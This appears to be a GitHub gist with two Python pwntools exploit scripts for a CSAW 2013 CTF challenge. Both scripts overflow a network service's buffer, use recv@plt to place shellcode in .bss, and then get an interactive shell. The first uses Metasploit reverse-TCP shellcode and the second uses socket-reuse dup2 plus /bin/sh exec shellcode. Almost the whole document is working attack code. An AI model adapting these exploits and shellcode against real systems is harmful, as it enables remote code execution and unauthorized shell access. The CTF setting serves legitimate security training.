Skip to content

Instantly share code, notes, and snippets.

@Tosainu

Tosainu/exploit.py

Last active February 21, 2017 08:03
Show Gist options
  • Save Tosainu/5e0a1764c020a7e5b251b64b48b1468c to your computer and use it in GitHub Desktop.
Save Tosainu/5e0a1764c020a7e5b251b64b48b1468c to your computer and use it in GitHub Desktop.
Download ZIP
Raw
exploit.py
#!/usr/bin/env python2
# CSAW CTF Qualification Round 2013: Exploitation3
# http://shell-storm.org/repo/CTF/CSAW-2013/Exploitation/
from pwn import *
# gdb-peda$ patto 0x476e4131
# 1198407985 found at offset: 1056
padding = 1056
addr_bss = 0x804b008
# 08048890 <recv@plt>:
# 8048890: ff 25 f0 af 04 08 jmp DWORD PTR ds:0x804aff0
# 8048896: 68 e0 00 00 00 push 0xe0
# 804889b: e9 20 fe ff ff jmp 80486c0 <setsockopt@plt-0x10>
addr_recv_plt = 0x8048890
# msf > use payload/linux/x86/shell_reverse_tcp
# msf payload(shell_reverse_tcp) > generate -t python -o LHOST='0.0.0.0'
shellcode = ''
shellcode += '\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66'
shellcode += '\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x00'
shellcode += '\x00\x00\x00\x68\x02\x00\x11\x5c\x89\xe1\xb0\x66\x50'
shellcode += '\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73'
shellcode += '\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0'
shellcode += '\x0b\xcd\x80'
r = remote('localhost', 34266)
# login
r.recvuntil('UserName: ')
r.sendline('csaw2013')
r.recvuntil('Password: ')
r.sendline('S1mplePWD')
r.recvuntil('Entry Info: ')
r.sendline('-1')
payload = ''
payload += 'A' * padding
payload += p32(addr_recv_plt)
payload += p32(addr_bss)
payload += p32(4)
payload += p32(addr_bss)
payload += p32(len(shellcode))
payload += p32(0)
r.send(payload)
r.clean()
r.send(shellcode)
r.interactive()
Raw
exploit2.py
#!/usr/bin/env python2
# CSAW CTF Qualification Round 2013: Exploitation3
# http://shell-storm.org/repo/CTF/CSAW-2013/Exploitation/
from pwn import *
# gdb-peda$ patto 0x476e4131
# 1198407985 found at offset: 1056
padding = 1056
addr_bss = 0x804b008
# 08048890 <recv@plt>:
# 8048890: ff 25 f0 af 04 08 jmp DWORD PTR ds:0x804aff0
# 8048896: 68 e0 00 00 00 push 0xe0
# 804889b: e9 20 fe ff ff jmp 80486c0 <setsockopt@plt-0x10>
addr_recv_plt = 0x8048890
socket_fd = 4
shellcode = ''
# dup2(fd,0); dup2(fd,1); dup2(fd,2);
# http://shell-storm.org/shellcode/files/shellcode-259.php
shellcode += '\x31\xc9' # xor %ecx,%ecx
# shellcode += '\x56' # push %esi
# shellcode += '\x5b' # pop %ebx
shellcode += '\x8d\x59' + chr(socket_fd) # lea ebx, [ecx + socket_fd]
# loop:
shellcode += '\x6a\x3f' # push $0x3f
shellcode += '\x58' # pop %eax
shellcode += '\xcd\x80' # int $0x80
shellcode += '\x41' # inc %ecx
shellcode += '\x80\xf9\x03' # cmp $0x3,%cl
shellcode += '\x75\xf5' # jne 80483e8 <loop>
# msf > use payload/linux/x86/exec
# msf payload(exec) > generate -b '\x00' -t python -o CMD=/bin/sh
shellcode += '\xbb\x55\x28\xf8\x3d\xdd\xc5\xd9\x74\x24\xf4\x5d\x33'
shellcode += '\xc9\xb1\x0b\x31\x5d\x15\x83\xed\xfc\x03\x5d\x11\xe2'
shellcode += '\xa0\x42\xf3\x65\xd3\xc1\x65\xfe\xce\x86\xe0\x19\x78'
shellcode += '\x66\x80\x8d\x78\x10\x49\x2c\x11\x8e\x1c\x53\xb3\xa6'
shellcode += '\x17\x94\x33\x37\x07\xf6\x5a\x59\x78\x85\xf4\xa5\xd1'
shellcode += '\x3a\x8d\x47\x10\x3c'
r = remote('localhost', 34266)
# login
r.recvuntil('UserName: ')
r.sendline('csaw2013')
r.recvuntil('Password: ')
r.sendline('S1mplePWD')
r.recvuntil('Entry Info: ')
r.sendline('-1')
payload = ''
payload += 'A' * padding
payload += p32(addr_recv_plt)
payload += p32(addr_bss)
payload += p32(socket_fd)
payload += p32(addr_bss)
payload += p32(len(shellcode))
payload += p32(0)
r.send(payload)
r.clean()
r.send(shellcode)
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment